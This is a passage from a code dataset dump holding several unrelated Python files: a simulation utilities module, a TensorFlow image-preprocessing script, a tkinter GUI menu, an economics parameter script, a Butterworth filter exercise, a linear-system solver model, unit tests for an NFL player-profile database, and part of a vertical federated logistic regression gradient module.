x: x * 3600.0\nDAY = lambda x: x * HOUR(24)\nWEEK = lambda x: x * DAY(7)\n\n# And these to bytes.\nKB = lambda x: x << 10\nMB = lambda x: x << 20\n\n\ndef config_logging(config: Configuration) -> None:\n \"\"\"Sets logging basic config\"\"\"\n logging.basicConfig(\n format='%(asctime)s %(levelname)s(%(name)s): %(message)s',\n datefmt='%d/%m/%Y %H:%M:%S',\n level=logging.DEBUG if config.get_arg('debug') else logging.INFO)\n logging.captureWarnings(True)\n\n\n# pylint: disable=invalid-name,too-few-public-methods\nclass profile:\n \"\"\"Decorator to run a function and generate a trace.\"\"\"\n\n @injector.inject\n def __init__(self, config: Configuration):\n super(profile, self).__init__()\n self.__config = config\n\n def __call__(self, func: typing.Callable[..., T]) -> T:\n\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n \"\"\"Wraps the function generating a trace.\"\"\"\n if self.__config.get_arg('trace'):\n profiler = cProfile.Profile()\n profiler.enable()\n\n ret = func(*args, **kwargs)\n\n if self.__config.get_arg('trace'):\n profiler.create_stats()\n profiler.dump_stats('trace')\n\n return ret\n\n return wrapper\n\n\ndef timestamp_to_day(timestamp: int) -> typing.Tuple[int, int]:\n \"\"\"Converts from a simulation timestamp to the pair (day, hour).\"\"\"\n day = int((timestamp % WEEK(1)) // DAY(1))\n hour = int((timestamp % DAY(1)) // HOUR(1))\n return day, hour\n\n\n# pylint: disable=invalid-name,no-member\ndef weight(x: float, ip: float, fp: float) -> float:\n \"\"\"Linear increment between ip and fp function.\"\"\"\n return numpy.maximum(0.0, numpy.minimum(1.0, (ip - x) / (ip - fp)))\n\n\n# pylint: disable=invalid-name\ndef weighted_user_satisfaction(\n t: float, timeout: float, threshold: float) -> float:\n \"\"\"Calculates the weighted satisfaction with a sigmoid.\"\"\"\n return numpy.where(t < timeout, 1.0, 
weight(t - timeout, 60, threshold))\n\n\ndef user_satisfaction(t: float, timeout: float) -> float:\n    \"\"\"Calculates plain old user satisfaction.\"\"\"\n    return numpy.where(t < timeout, 1.0, 0.0)\n\n\ndef generate_servers(size: int) -> typing.List[str]:\n    \"\"\"Generates a list of servers randomly generated.\"\"\"\n    fill = math.ceil(math.log(size, 10))\n    return ['workstation' + str(i).zfill(fill) for i in range(size)]\n","sub_path":"simulation/static.py","file_name":"static.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"462833344","text":"# Resize the original images to the required size and save them \n# Build the TFRecords file, then read the data back from tfrecords, reshape to 64x64 and save\n#======================================================================================== \nimport os \nimport numpy as np \nimport tensorflow as tf \nfrom PIL import ImageFile\nfrom PIL import Image\nImageFile.LOAD_TRUNCATED_IMAGES = True\n \n# Where the original images are stored \npath=os.path.abspath('.')\norig_picture =path + '/pic'  # the images sit in per-class folders under pic \n#orig_picture = 'C:/Users/zhuan/Desktop/tf/pic' \n \n# Where the generated images are stored \ngen_picture =path+ '/pic/test_data'  # the 64x64 samples are written here\n \n# Class labels to recognise \nclasses = {'ok','liefeng','qinshituoluo','wailu','wusun'}  # note: this is a set literal, not a dict \n \n# Total number of samples \n#num_samples = 74 \n\nnum_samples = 5702\n \n# Build the TFRecords data \ndef create_record(): \n    writer = tf.python_io.TFRecordWriter(\"train.tfrecords\") \n    for index, name in enumerate(classes):   # enumerate yields an index and a value: index is the label id, name the class name \n        class_path = orig_picture +\"/\"+ name+\"/\" \n        i = 0\n        for img_name in os.listdir(class_path): \n            img_path = class_path + img_name \n            img = Image.open(img_path) \n            img = img.resize((64, 64)) \n            # target size for the conversion\n            i = i+1\n            print(\"converted\", i, \"images\")\n#            img = img.tf.image.resize_images()    # target size for the conversion \n            img_raw = img.tobytes()      # convert the image to raw bytes \n#            print (index,img_raw) \n            example = tf.train.Example( \n               features=tf.train.Features(feature={ \n                    \"label\": tf.train.Feature(int64_list=tf.train.Int64List(value=[index])), \n                    'img_raw': tf.train.Feature(bytes_list=tf.train.BytesList(value=[img_raw])) \n               })) \n\t\t\t # write the TFRecord\n            writer.write(example.SerializeToString()) \n    writer.close() \n#    \n#======================================================================================= \ndef read_and_decode(filename): \n    # create a file queue with no limit on the number of reads \n    filename_queue = tf.train.string_input_producer([filename]) \n    # create a reader from file queue \n    reader = tf.TFRecordReader() \n    # the reader pulls one serialized example from the file queue \n    _, serialized_example = reader.read(filename_queue) \n    # get feature from serialized example \n    # parse the serialized example \n    features = tf.parse_single_example( \n        serialized_example, \n        features={ \n            'label': tf.FixedLenFeature([], tf.int64), \n            'img_raw': tf.FixedLenFeature([], tf.string) \n        }) \n    label = features['label'] \n    img = features['img_raw'] \n    img = tf.decode_raw(img, tf.uint8) \n    img = tf.reshape(img, [64, 64, 3]) \n#    img = tf.cast(img, tf.float32) * (1. / 255) - 0.5 \n    label = tf.cast(label, tf.int32) \n    return img, label \n \n#======================================================================================= \nif __name__ == '__main__': \n    create_record() \n    batch = read_and_decode('train.tfrecords') \n    init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer()) \n     \n    with tf.Session() as sess: # start a session \n        sess.run(init_op) \n        coord=tf.train.Coordinator() \n        threads= tf.train.start_queue_runners(coord=coord) \n#        print(sess.run(batch))\n        for i in range(num_samples): \n            try:\n                example, lab = sess.run(batch)   # fetch an image and label inside the session \n#                print(example)\n            except:\n                print(\"error while reading an example\")\n            img=Image.fromarray(example, 'RGB')  # Image is the PIL class imported above \n            img.save(gen_picture+'/'+str(lab)+'/'+str(i)+'samples'+str(lab)+'.jpg')\n            print(\"image\", i+1, \"written successfully\")\n            # save the image; note the '/' appended to the cwd path \n#            print(example, lab) \n        coord.request_stop() \n        coord.join(threads) \n        sess.close()","sub_path":"预处理.py","file_name":"预处理.py","file_ext":"py","file_size_in_byte":4336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"369547838","text":"from tkinter import *\nfrom tkinter import messagebox\nfrom screens.stud_det import *\nfrom screens.attendence import *\nfrom screens.electives import *\nfrom screens.to_login import ToLogin\nfrom screens.marks import *\nfrom screens.placement import *\nfrom PIL import Image, ImageTk\nfrom screens.placement_det import *\n#import screens.login as log\n\n\nclass Placement:\n    def __init__(self):\n\n        self.root = Toplevel()\n        self.root.geometry(\"2000x1024\")\n\n        self.root.title(\"Menu\")\n        self.c = Canvas(self.root,bg = \"gray\",height=2000,width=2024)\n        # image = Image.open(\"images/epic1.png\")\n        # photo = ImageTk.PhotoImage(image)\n        photo = PhotoImage(file = \"images/plac.png\")\n        \n        # Setting the background\n        self.c.create_image((0,0), image=photo, anchor=\"nw\")\n\n        \n        # Setting the font\n        self.fnt = ('latin modern typewriter',50,'bold')\n        \n        # Setting the text\n\n        self.c.create_text((600, 150), text=\"SELECT BRANCH\", fill=\"black\", anchor=\"nw\"\n                      ,font=('newcenturyschlbk',50,'bold'))\n\n\n\n\n        self.back = Button(self.c,text='Back',bg='red',fg='white',activebackground='black',activeforeground='white',width=10,height=2, font=(\"Times\",20,'bold'),command=lambda:back())\n        self.back.place(x=1400,y=900,width=100,height=40)\n\n\n\n        def back():\n            self.root.destroy() \n\n\n        self.c.pack()\n        self.back = Button(self.c,text='Back',bg='red',fg='white',activebackground='black',activeforeground='white',width=10,height=2, font=(\"Times\",15,'bold'),command=lambda:back())\n\n\n        self.b1 = Button(self.c,text='CSE',bg='yellow',fg='blue',activebackground='black',activeforeground='white',width=20,height=7, font=(\"Times\",25,'bold'),command=lambda:buttonClick('CSE'))\n        self.b2 = Button(self.c,text='ISE',bg='yellow',fg='blue',activebackground='black',activeforeground='white',width=20,height=7,font=(\"Times\",25,'bold'),command=lambda:buttonClick('ISE'))\n        self.b3 = Button(self.c,text='ECE',bg='yellow',fg='blue',activebackground='black',activeforeground='white',width=20,height=7,font=(\"Times\",25,'bold'),command=lambda:buttonClick('ECE'))\n        self.b4 = Button(self.c,text='TC',bg='yellow',fg='blue',activebackground='black',activeforeground='white',width=20,height=7, font=(\"Times\",25,'bold'),command=lambda:buttonClick('TC'))\n\n        self.b5 = Button(self.c,text='ME',bg='yellow',fg='blue',activebackground='black',activeforeground='white',width=20,height=7, 
font=(\"Times\",25,'bold'),command=lambda:buttonClick('ME'))\n        self.b6 = Button(self.c,text='IEM',bg='yellow',fg='blue',activebackground='black',activeforeground='white',width=20,height=7, font=(\"Times\",25,'bold'),command=lambda:buttonClick('IEM'))\n\n        self.b1.place(x=800,y=300,width=300,height=50)\n        self.b2.place(x=800,y=380,width=300,height=50)\n        self.b3.place(x=800,y=460,width=300,height=50)\n        self.b4.place(x=800,y=540,width=300,height=50)\n        self.b5.place(x=800,y=620,width=300,height=50)\n        self.b6.place(x=800,y=700,width=300,height=50)\n        \n        def back():\n            self.root.destroy()\n            # b = log.Login()\n        \n\n        def buttonClick(branch):\n            a = PlacementDetails(branch)\n\n        self.root.mainloop()\n        \na = Placement()","sub_path":"screens/placement.py","file_name":"placement.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"261643776","text":"import numpy as np\nfrom numpy import array\n\n# == Parameters == #\nβ = 1 / 1.05\nρ, mg = .7, .35\nA = np.identity(2)\nA[0, :] = ρ, mg * (1-ρ)\nC = np.zeros((2, 1))\nC[0, 0] = np.sqrt(1 - ρ**2) * mg / 10\nSg = array((1, 0)).reshape(1, 2)\nSd = array((0, 0)).reshape(1, 2)\nSb = array((0, 2.135)).reshape(1, 2)\nSs = array((0, 0)).reshape(1, 2)\n\neconomy = Economy(β=β,\n                  Sg=Sg,\n                  Sd=Sd,\n                  Sb=Sb,\n                  Ss=Ss,\n                  discrete=False,\n                  proc=(A, C))\n\nT = 50\npath = compute_paths(T, economy)\ngen_fig_1(path)\n","sub_path":"lqramsey/lqramsey_ar1.py","file_name":"lqramsey_ar1.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"380244753","text":"'''\nBuild a Butterworth high-pass filter using its definition in the\nfrequency domain. Filter an image, varying the cutoff frequency and\nchecking the effect on the filtered image. Verify the behaviour of the\nfilter with respect to the Gibbs phenomenon.\n'''\n#python 006-pbi.py -i ../imgs/chairs.jpg\n\nimport cv2 as cv\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport argparse\n\n'''\n    Arguments\n'''\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--imagem\", required=True, help=\"Image\")\n\n\n'''\n    Performs the Fourier transform and returns the magnitude and phase.\n''' \ndef tf_complexa(im):\n    # To hold the result of the transform\n    planos = [np.float32(im), np.zeros(im.shape, np.float32)]\n    tf = cv.merge(planos)\n    # Transform \n    tf = cv.dft(tf, cv.DFT_COMPLEX_OUTPUT)\n    # compute magnitude, planos[0] = real, planos[1] = imaginary\n    planos = cv.split(tf)\n    magn, fase = cv.cartToPolar(planos[0],planos[1], angleInDegrees=False)\n    # logarithmic scale\n    #magn = cv.log(magn + 1)\n    # centre the spectrum\n    magn = np.fft.fftshift(magn, axes=None)\n    return magn, fase\n\n\n'''\n    Butterworth filter (low-pass; for high-pass, filtro = 1 - filtro)\nfiltro = 1 / (1 + (D(u,v)/d)^(2n)), D(u,v) = [(u - P/2)^2 + (v - Q/2)^2]^(1/2)\n'''\ndef filtro_bw(lin, col, corte, ordem):\n    filtro = np.zeros((lin, col), np.float32)\n    # Ideal cutoff is between 2% and 5% of the smaller image dimension\n    if lin < col:\n        corte *= lin\n    else:\n        corte *= col\n\n    for x in range(lin):\n        for y in range(col):\n            # // = integer division\n            d = ((x - lin//2)**2 + (y - col//2)**2) ** 0.5\n            bw = 1.0 / (1 + (d/corte) ** ordem)\n            filtro[x,y] = bw\n    filtro = 1 - filtro\n    return filtro\n\n\n'''\n    Apply the filter in the frequency domain.\n'''\ndef aplicar_filtro(magn, filtro):\n    # Bring the filter into the frequency domain\n    fmg, ffs = tf_complexa(filtro)\n    # Apply\n    rmg = cv.mulSpectrums(magn, fmg, cv.DFT_ROWS)\n    rmg = np.fft.ifftshift(rmg, axes=None)\n    return rmg\n\n\n'''\n    MAIN\n'''\ndef main():\n    \n    # Images\n    args = vars(ap.parse_args())\n    img = cv.imread(args[\"imagem\"], 0)\n    [alt, larg] = img.shape\n    corte = 0.00009\n    ordem = 2\n    \n    # Transform \n    m, f = tf_complexa(img)\n\n    # Filter\n    fb = filtro_bw(alt, larg, corte, ordem)\n    mf = aplicar_filtro(m, fb) \n\n    # Reassemble real and imaginary parts \n    x, y = cv.polarToCart(mf, f, angleInDegrees=False)\n    im = cv.merge([x, y])\n\n    # Inverse transform\n    inv = cv.idft(im, cv.DFT_COMPLEX_OUTPUT)\n\n    # Combine channels for display\n    r = cv.magnitude(inv[:,:,0], inv[:,:,1])\n    \n    # Normalise\n    r = cv.normalize(r, 0, 255, cv.NORM_MINMAX)\n\n    # Display\n    plt.subplot(1,2,1)\n    plt.xticks([])\n    plt.yticks([])\n    plt.title(\"Original\")\n    plt.imshow(img, cmap=\"gray\")\n    \n    plt.subplot(1,2,2)\n    plt.xticks([])\n    plt.yticks([])\n    plt.title(\"Filtered\")\n    plt.imshow(r, cmap=\"gray\")\n\n    plt.show()\n\n\n\nif __name__ == \"__main__\":\n    main()\n\n\n","sub_path":"pratica5/009-hpbw.py","file_name":"009-hpbw.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"615311734","text":"# -*- coding: utf-8 -*-\n\nfrom sole import SoLE\nfrom Matrix import Matrix\nimport time\n\nclass Model:\n\n    def __init__(self):\n        # Create an empty system\n        self.system = None\n        self.n = 0\n\n    # Method that resizes the system of linear equations and correctly preserves the old data\n    def set_varnum(self, n):\n        if self.system is None:\n            A = Matrix(n, n, value=0)\n            b = Matrix(n, 1, value=0)\n            self.system = SoLE(A, b)\n            self.n = n\n        else:\n            A = Matrix(n, n, value=0)\n            b = Matrix(n, 1, value=0)\n            N = n if n < self.n else self.n\n            # Old values are kept, new entries are 0\n            for i in range(N):\n                b.elements[i][0] = self.system.free_members.elements[i][0]\n                for j in range(N):\n                    A.elements[i][j] = self.system.system_matrix.elements[i][j]\n            self.n = n\n            self.system = SoLE(A, b)\n\n    # Method that solves the system with the chosen method to the chosen precision\n    # Also measures the execution time\n    def solve(self, method, eps):\n        if method == 0:\n            m = self.system.method_Jacobi\n        elif method == 1:\n            m = self.system.method_Gauss_Seidel\n        else:\n            m = self.system.method_gradient_descent\n        t1 = time.time()\n        res = m(eps)\n        t = time.time() - t1\n        return (res, t)\n\n\n\n\n","sub_path":"Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"47065059","text":"import unittest\nimport os\nimport json\nfrom typing import List\nimport random\nimport nflapi.Client\nfrom nflapidb.RosterManagerFacade import RosterManagerFacade\nfrom nflapidb.PlayerProfileManagerFacade import PlayerProfileManagerFacade\nfrom nflapidb.EntityManager import EntityManager\nimport nflapidb.Utilities as util\n\nclass TestPlayerProfileManagerFacade(unittest.TestCase):\n\n    def setUp(self):\n        self.entityName = \"player_profile\"\n        self.entmgr = EntityManager()\n\n    def tearDown(self):\n        util.runCoroutine(self.entmgr.drop(self.entityName))\n        self.entmgr.dispose()\n\n    def _getMockPlayerProfileManager(self, rosterData : List[dict], profileData : List[dict]):\n        apiClient = MockApiClient(profileData)\n        rmgr = MockRosterManagerFacade(self.entmgr, apiClient, rosterData)\n        self.datamgr = PlayerProfileManagerFacade(self.entmgr, apiClient, rmgr)\n        return self.datamgr\n\n    def _getPlayerProfileManager(self):\n        self.datamgr = PlayerProfileManagerFacade(self.entmgr)\n        return self.datamgr\n\n    def test_sync_initializes_collection_one_team(self):\n        with open(os.path.join(os.path.dirname(__file__), \"data\", \"roster_kc.json\"), \"rt\") as fp:\n            rstdata = json.load(fp)\n        with 
open(os.path.join(os.path.dirname(__file__), \"data\", \"roster_kc.json\"), \"rt\") as fp:\n rstdata = json.load(fp)\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"roster_pit.json\"), \"rt\") as fp:\n rstdata.extend(json.load(fp))\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_kc.json\"), \"rt\") as fp:\n srcdata = json.load(fp)\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_pit.json\"), \"rt\") as fp:\n srcdata.extend(json.load(fp))\n rmgr = self._getMockPlayerProfileManager(rosterData=rstdata, profileData=srcdata)\n recs = util.runCoroutine(rmgr.sync())\n xreqrec = []\n for rec in rstdata:\n if rec[\"profile_id\"] == 2560950:\n rec[\"team\"] = \"KC\"\n xreqrec.append(rec)\n xrec = []\n for rec in srcdata:\n if rec[\"profile_id\"] == 2560950:\n rec[\"team\"] = \"KC\"\n crec = rec.copy()\n # Since the team is changing the previous_teams attribute should be set\n crec[\"previous_teams\"] = [\"PIT\"]\n xrec.append(crec)\n rmgr = self._getMockPlayerProfileManager(rosterData=rstdata, profileData=srcdata)\n recs = util.runCoroutine(rmgr.sync())\n self.assertEqual(rmgr._apiClient.getRequestedRosters(), xreqrec, \"requested rosters differs\")\n self.assertEqual(len(recs), 1, \"sync returned record count differs\")\n dbrecs = util.runCoroutine(self.entmgr.find(self.entityName,\n query={\"profile_id\": 2560950},\n projection={\"_id\": False}))\n self.assertEqual(len(dbrecs), 1, \"db record counts differ\")\n self.assertEqual(dbrecs, xrec, \"db records differ\")\n\n def test_sync_updates_nothing_with_no_team_change(self):\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"roster_kc.json\"), \"rt\") as fp:\n rstdata = json.load(fp)\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"roster_pit.json\"), \"rt\") as fp:\n rstdata.extend(json.load(fp))\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_kc.json\"), \"rt\") as fp:\n srcdata = json.load(fp)\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_pit.json\"), \"rt\") as fp:\n srcdata.extend(json.load(fp))\n rmgr = self._getMockPlayerProfileManager(rosterData=rstdata, profileData=srcdata)\n recs = util.runCoroutine(rmgr.sync())\n rmgr = self._getMockPlayerProfileManager(rosterData=rstdata, profileData=srcdata)\n recs = util.runCoroutine(rmgr.sync())\n self.assertEqual(len(recs), 0, \"sync returned record count differs\")\n self.assertEqual(rmgr._apiClient.getRequestedRosters(), [], \"requested rosters differs\")\n\n def test_sync_updates_all_with_all(self):\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"roster_kc.json\"), \"rt\") as fp:\n rstdata = json.load(fp)\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"roster_pit.json\"), \"rt\") as fp:\n rstdata.extend(json.load(fp))\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_kc.json\"), \"rt\") as fp:\n srcdata = json.load(fp)\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_pit.json\"), \"rt\") as fp:\n srcdata.extend(json.load(fp))\n rmgr = self._getMockPlayerProfileManager(rosterData=rstdata, profileData=srcdata)\n recs = util.runCoroutine(rmgr.sync())\n def pidmap(recs : List[dict]) -> dict:\n return dict(zip([_[\"profile_id\"] for _ in recs], recs))\n rmap = pidmap(rstdata.copy())\n pmap = pidmap(srcdata.copy())\n usrcdata = []\n for pid in rmap:\n t = random.choice([\"KC\", \"PIT\"])\n rmap[pid][\"team\"] = t\n pmap[pid][\"team\"] = t\n 
usrcdata.append(pmap[pid])\n rmgr = self._getMockPlayerProfileManager(rosterData=list(rmap.values()), profileData=usrcdata)\n recs = util.runCoroutine(rmgr.sync(all=True))\n self.assertEqual(len(recs), len(usrcdata), \"sync returned record count differs\")\n dbrecs = util.runCoroutine(self.entmgr.find(self.entityName, projection={\"_id\": False}))\n self.assertEqual(dbrecs, usrcdata, \"db records differ\")\n\n def test_save_appends(self):\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"roster_kc.json\"), \"rt\") as fp:\n kcrdata = json.load(fp)\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_kc.json\"), \"rt\") as fp:\n kcdata = json.load(fp)\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_pit.json\"), \"rt\") as fp:\n pitdata = json.load(fp)\n rmgr = self._getMockPlayerProfileManager(rosterData=kcrdata, profileData=kcdata.copy())\n recs = util.runCoroutine(rmgr.sync())\n self.assertEqual(len(recs), len(kcdata), \"sync record count differs\")\n recs.extend(util.runCoroutine(rmgr.save(pitdata.copy())))\n self.assertEqual(len(recs), len(kcdata) + len(pitdata), \"save record count differs\")\n dbrecs = util.runCoroutine(self.entmgr.find(self.entityName))\n self.assertEqual(len(dbrecs), len(recs), \"db record count differs\")\n self.assertEqual(dbrecs, recs, \"db records differ\")\n\n def test_save_updates_previous_team(self):\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"roster_kc.json\"), \"rt\") as fp:\n srcrdata = json.load(fp)\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"roster_pit.json\"), \"rt\") as fp:\n srcrdata.extend(json.load(fp))\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_kc.json\"), \"rt\") as fp:\n kcdata = json.load(fp)\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_pit.json\"), \"rt\") as fp:\n pitdata = json.load(fp)\n srcdata = kcdata.copy()\n srcdata.extend(pitdata.copy())\n rmgr = self._getMockPlayerProfileManager(rosterData=srcrdata, profileData=srcdata)\n recs = util.runCoroutine(rmgr.sync())\n self.assertEqual(len(recs), len(srcdata), \"sync record count differs\")\n for rec in pitdata:\n if rec[\"profile_id\"] == 2560950:\n rec[\"team\"] = \"KC\"\n kcdata.append(rec)\n recs2 = util.runCoroutine(rmgr.save(kcdata.copy()))\n self.assertEqual(len(recs2), len(kcdata), \"save record count differs\")\n dbrecs = util.runCoroutine(self.entmgr.find(self.entityName, projection={\"_id\": False}))\n self.assertEqual(len(dbrecs), len(srcdata), \"db record count differs\")\n for rec in srcdata:\n if rec[\"profile_id\"] == 2560950:\n rec[\"team\"] = \"KC\"\n rec[\"previous_teams\"] = [\"PIT\"]\n self.assertEqual(dbrecs, srcdata, \"db records differ\")\n\n def test_delete_team(self):\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_kc.json\"), \"rt\") as fp:\n kcdata = json.load(fp)\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_pit.json\"), \"rt\") as fp:\n pitdata = json.load(fp)\n srcdata = kcdata.copy()\n srcdata.extend(pitdata.copy())\n rmgr = self._getPlayerProfileManager()\n recs = util.runCoroutine(rmgr.save(srcdata))\n self.assertEqual(len(recs), len(srcdata), \"save returned record count differs\")\n dcount = util.runCoroutine(rmgr.delete(teams=[\"PIT\"]))\n self.assertEqual(dcount, len(pitdata), \"delete returned record count differs\")\n dbrecs = util.runCoroutine(self.entmgr.find(self.entityName))\n self.assertEqual(len(dbrecs), 
len(kcdata), \"db record count differs\")\n for rec in dbrecs:\n del rec[\"_id\"]\n self.assertEqual(dbrecs, kcdata, \"db records differ\")\n\n def test_delete_profile_id(self):\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_kc.json\"), \"rt\") as fp:\n srcdata = json.load(fp)\n rmgr = self._getPlayerProfileManager()\n recs = util.runCoroutine(rmgr.save(srcdata))\n self.assertEqual(len(recs), len(srcdata), \"save returned record count differs\")\n dcount = util.runCoroutine(rmgr.delete(profile_ids=[2562399]))\n self.assertEqual(dcount, 1, \"delete returned record count differs\")\n dbrecs = util.runCoroutine(self.entmgr.find(self.entityName))\n self.assertEqual(len(dbrecs), len(srcdata) - 1, \"db record count differs\")\n xdata = [_ for _ in srcdata if _[\"profile_id\"] != 2562399]\n self.assertEqual(dbrecs, xdata, \"db records differ\")\n\nclass MockRosterManagerFacade(RosterManagerFacade):\n def __init__(self, entityManager : EntityManager, apiClient : nflapi.Client.Client, findData : List[dict]):\n super(MockRosterManagerFacade, self).__init__(entityManager, apiClient)\n self._find_data = findData\n\n async def find(self, *args) -> List[dict]:\n return self._find_data.copy()\n\nclass MockApiClient(nflapi.Client.Client):\n def __init__(self, profileData : List[dict]):\n self._profile_data = dict(zip([_[\"profile_id\"] for _ in profileData], profileData))\n self._req_rosters = []\n\n def getPlayerProfile(self, rosters : List[str]) -> List[dict]:\n self._req_rosters = rosters\n data = []\n for pid in [_[\"profile_id\"] for _ in rosters]:\n if pid in self._profile_data:\n data.append(self._profile_data[pid])\n return data\n\n def getRequestedRosters(self) -> List[dict]:\n return self._req_rosters\n","sub_path":"tests/TestPlayerProfileManagerFacade.py","file_name":"TestPlayerProfileManagerFacade.py","file_ext":"py","file_size_in_byte":12834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"4745865","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright 2021 Tianmian Tech. All Rights Reserved.\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Copyright 2019 The FATE Authors. 
All Rights Reserved.\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\n\nimport functools\nimport random\n\nimport numpy as np\nimport scipy.sparse as sp\n\nfrom common.python.utils import log_utils\nfrom kernel.base.sparse_vector import SparseVector\nfrom kernel.components.lr.vertlr.sync import loss_sync\nfrom kernel.optimizer.activation import sigmoid\nfrom kernel.utils import base_operator\nfrom kernel.utils import consts\nfrom kernel.utils import data_util\nfrom kernel.utils.base_operator import vec_dot\nfrom kernel.utils.random_number_generator import RandomNumberGenerator\n\nLOGGER = log_utils.get_logger()\n\n\ndef __compute_partition_gradient(data, fit_intercept=True, is_sparse=False):\n \"\"\"\n Compute vert regression gradient for:\n gradient = ∑d*x, where d is fore_gradient which differ from different algorithm\n Parameters\n ----------\n data: DSource, include fore_gradient and features\n fit_intercept: bool, if model has interception or not. Default True\n\n Returns\n ----------\n numpy.ndarray\n vert regression model gradient\n \"\"\"\n # LOGGER.debug(\"enter __compute_partition_gradient\")\n feature = []\n fore_gradient = []\n\n if is_sparse:\n row_indice = []\n col_indice = []\n data_value = []\n\n row = 0\n feature_shape = None\n for key, (sparse_features, d) in data:\n fore_gradient.append(d)\n assert isinstance(sparse_features, SparseVector)\n if feature_shape is None:\n feature_shape = sparse_features.get_shape()\n for idx, v in sparse_features.get_all_data():\n col_indice.append(idx)\n row_indice.append(row)\n data_value.append(v)\n row += 1\n if feature_shape is None or feature_shape == 0:\n return 0\n sparse_matrix = sp.csr_matrix((data_value, (row_indice, col_indice)), shape=(row, feature_shape))\n fore_gradient = np.array(fore_gradient)\n\n # gradient = sparse_matrix.transpose().dot(fore_gradient).tolist()\n gradient = base_operator.dot(sparse_matrix.transpose(), fore_gradient).tolist()\n if fit_intercept:\n bias_grad = np.sum(fore_gradient)\n gradient.append(bias_grad)\n LOGGER.debug(\"In first method, gradient: {}, bias_grad: {}\".format(gradient, bias_grad))\n return np.array(gradient)\n\n else:\n for key, value in data:\n feature.append(value[0])\n fore_gradient.append(value[1])\n feature = np.array(feature)\n fore_gradient = np.array(fore_gradient)\n if feature.shape[0] <= 0:\n return 0\n\n gradient = base_operator.dot(feature.transpose(), fore_gradient)\n gradient = gradient.tolist()\n if fit_intercept:\n bias_grad = np.sum(fore_gradient)\n gradient.append(bias_grad)\n return np.array(gradient)\n\n\ndef compute_gradient(data_instances, fore_gradient, fit_intercept):\n \"\"\"\n Compute vert-regression gradient\n Parameters\n ----------\n data_instances: DSource, input data\n fore_gradient: DSource, fore_gradient\n fit_intercept: bool, if model has intercept or not\n\n Returns\n ----------\n DSource\n the vert regression model's gradient\n \"\"\"\n feat_join_grad = data_instances.join(fore_gradient,\n lambda d, g: (d.features, g))\n is_sparse = 
data_util.is_sparse_data(data_instances)\n f = functools.partial(__compute_partition_gradient,\n fit_intercept=fit_intercept,\n is_sparse=is_sparse)\n gradient_partition = feat_join_grad.mapPartitions(f)\n gradient_partition = gradient_partition.reduce(lambda x, y: x + y)\n\n gradient = gradient_partition / data_instances.count()\n\n return gradient\n\n\nclass VertGradientBase(object):\n def federated_compute_gradient_and_loss(self, *args):\n raise NotImplementedError(\"Should not call here\")\n\n def set_total_batch_nums(self, total_batch_nums):\n \"\"\"\t\n Use for sqn gradient.\t\n \"\"\"\n pass\n\n\nclass Promoter(VertGradientBase, loss_sync.Promoter):\n\n def __init__(self):\n self.provider_forwards = None\n self.fore_gradient = None\n self.forwards = None\n # self.aggregated_forwards = None\n\n def _register_gradient_sync(self, provider_weight_transfer, provider_forward_transfer, fore_gradient_transfer,\n provider_gradient_r_transfer, provider_en_gradient_r_transfer):\n self.provider_weight_transfer = provider_weight_transfer\n self.provider_forward_transfer = provider_forward_transfer\n self.fore_gradient_transfer = fore_gradient_transfer\n self.provider_gradient_r_transfer = provider_gradient_r_transfer\n 